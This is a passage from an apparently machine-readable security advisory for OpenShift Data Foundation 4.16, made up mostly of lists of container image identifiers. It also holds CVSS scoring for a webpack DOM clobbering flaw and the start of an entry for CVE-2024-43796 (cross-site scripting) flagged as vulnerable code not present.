"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43796", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:28.106254+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", 